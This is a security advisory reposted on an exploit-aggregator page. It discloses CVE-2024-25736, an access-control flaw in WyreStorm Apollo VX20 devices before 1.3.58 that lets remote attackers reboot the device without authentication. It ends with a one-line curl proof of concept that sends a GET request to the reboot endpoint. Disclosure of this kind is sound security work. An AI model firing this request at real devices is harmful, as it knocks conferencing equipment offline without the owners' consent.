Share
## https://sploitus.com/exploit?id=1337DAY-ID-39322
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     


[Vendor]
www.wyrestorm.com


[Product]
APOLLO VX20 < 1.3.58


[Vulnerability Type]
Incorrect Access Control (DOS)


[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58


[Affected Component]
Web interface, reboot and reset commands


[CVE Reference]
CVE-2024-25736


[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.


[Exploit/POC]
curl -k https://192.168.x.x/device/reboot